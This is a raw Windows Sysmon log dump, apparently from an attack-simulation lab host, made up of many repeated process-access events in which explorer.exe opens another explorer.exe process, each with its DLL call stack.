16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241114Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241113Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241112Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241111Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241110Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241109Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241108Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241107Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241106Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241105Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241104Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241103Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241102Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241101Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241100Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241099Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241098Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241097Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241096Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241095Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241094Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241093Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241092Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241091Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241090Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241089Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241088Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241087Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 